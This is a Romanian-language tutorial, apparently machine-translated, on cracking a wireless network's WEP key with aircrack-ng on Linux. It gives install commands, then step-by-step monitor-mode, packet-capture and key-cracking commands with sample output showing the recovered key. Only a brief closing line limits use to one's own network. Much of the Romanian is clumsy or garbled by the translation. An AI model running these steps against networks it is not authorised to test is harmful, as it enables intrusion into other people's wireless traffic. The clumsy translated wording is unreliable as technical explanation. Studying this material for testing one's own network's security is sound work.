acest articol descrie pe scurt pași simpli despre cum să spargeți o cheie WEP fără fir folosind software-ul aircrack-ng. Acest lucru se poate face prin sniffing o rețea fără fir, captarea de pachete criptate și rulează criptare corespunzătoare cracare program în încercarea de a decripta datele capturate. WEP (Wired Equivalent Privacy) este destul de ușor de spart, deoarece folosește o singură cheie pentru a cripta tot traficul.
principiul de bază este că comunicarea între două noduri din rețea se bazează pe adresa MAC. Fiecare gazdă primește pachete destinate numai pentru adresa MAC a propriei interfețe. Același principiu se aplică și rețelelor fără fir. Cu toate acestea, dacă un nod își stabilește propria placă de rețea în modul promiscuu, va primi și pachete care nu sunt adresate pentru propria adresă MAC.
pentru a sparge cheia WEP, un hacker trebuie să captureze pachete de probă care nu sunt destinate propriei interfețe de rețea și să ruleze programul crack pentru a compara cheile de testare cu cheia WEP la pachet cu pachetele capturate în încercarea de decriptare. Cheia care se potrivește pentru a decripta pachetele capturate este cheia utilizată de rețeaua fără fir pentru a cripta întreaga sa comunicare fără fir cu stațiile sale conectate.
în secțiunile următoare, vă vom ghida prin instalarea aircrack-ng pe Linux, apoi vă vom arăta instrucțiunile pas cu pas pentru a sparge o cheie WEP fără fir. Ghidul presupune că aveți instalat placa de rețea fără fir și că acceptă modul monitor.
în acest tutorial veți învăța:
- cum se instalează aircrack-ng pe distros majore Linux
- cum de a sparge o cheie WEP fără fir folosind aircrack-ng
Categorie | cerințe, convenții sau versiunea Software utilizată |
---|---|
sistem | orice distribuție Linux |
Software-ul | aircrack-ng |
altele | acces privilegiat la sistemul Linux ca root sau prin comanda sudo . |
convenții | # – necesită comenzi linux date pentru a fi executate cu privilegii root fie direct ca utilizator root, fie prin utilizarea comenzii sudo $ – necesită comenzi linux date pentru a fi executate ca utilizator obișnuit non-privilegiat |
instalați aircrack-ng pe distribuții Linux majore
pentru a începe, veți avea nevoie de software-ul aircrack-ng instalat pe sistemul dvs. Puteți utiliza comanda corespunzătoare de mai jos pentru a instala programul cu managerul de pachete al sistemului dvs.
pentru a instala aircrack-ng pe Ubuntu, Debian și Linux Mint:
$ sudo apt install aircrack-ng
pentru a instala aircrack-ng pe CentOS, Fedora, AlmaLinux și Red Hat:
$ sudo dnf install aircrack-ng
pentru a instala aircrack-ng pe Arch Linux și Manjaro:
$ sudo pacman -S aircrack-ng
Crack wireless cheie WEP
- în primul rând avem nevoie pentru a identifica numele interfeței noastre de rețea fără fir. Dacă placa de rețea fără fir este instalată corect, o comandă
iwconfig
va dezvălui numele interfeței de rețea fără fir:$ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
rezultatul arată că, în cazul nostru, numele interfeței este
wlan0
. - apoi, activați modul monitor pentru interfața wireless.
# airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)
rezultatul comenzii vă va da numele noii interfețe virtuale. Acesta tinde să fie
mon0
. - aruncați rezultatele monitorului într-un terminal, astfel încât să le puteți vedea.
# airodump-ng mon0
puteți vedea un tabel de date referitoare la rețelele fără fir din zona dvs. Aveți nevoie doar de informații despre rețeaua pe care doriți să o spargeți. Căutați-l și notați BSSID și canalul pe care se află.
- apoi, veți înregistra rezultatele unei scanări într-un fișier. Acest jurnal de captare va fi necesar de Aircrack pentru a rula un atac de forță brută în rețea mai târziu. Pentru a obține captura, veți rula aceeași comandă ca înainte, dar veți specifica BSSID-ul, canalul și locația jurnalului.
# airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0
completați informațiile dvs. reale înainte de a rula comanda și lăsați-o să ruleze.
- ca un ultim pas vom sparge cheie WEP prin utilizarea pachetelor capturate și comanda aircrack-ng. Toate pachetele capturate sunt acum stocate în
wep-crack-01.cap
fișier.# aircrack-ng -z wep-crack-01.cap
producția dvs. ar trebui să arate cam așa:
Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
gânduri de închidere
în acest ghid, am văzut cum să instalăm aircrack-ng pe Linux și să folosim software-ul pentru a sparge o cheie WEP fără fir. Amintiți-vă că acest proces ar trebui folosit doar pentru a vă testa propria securitate sau în scopuri educaționale. Utilizarea acestuia în rețeaua altcuiva este ilegală.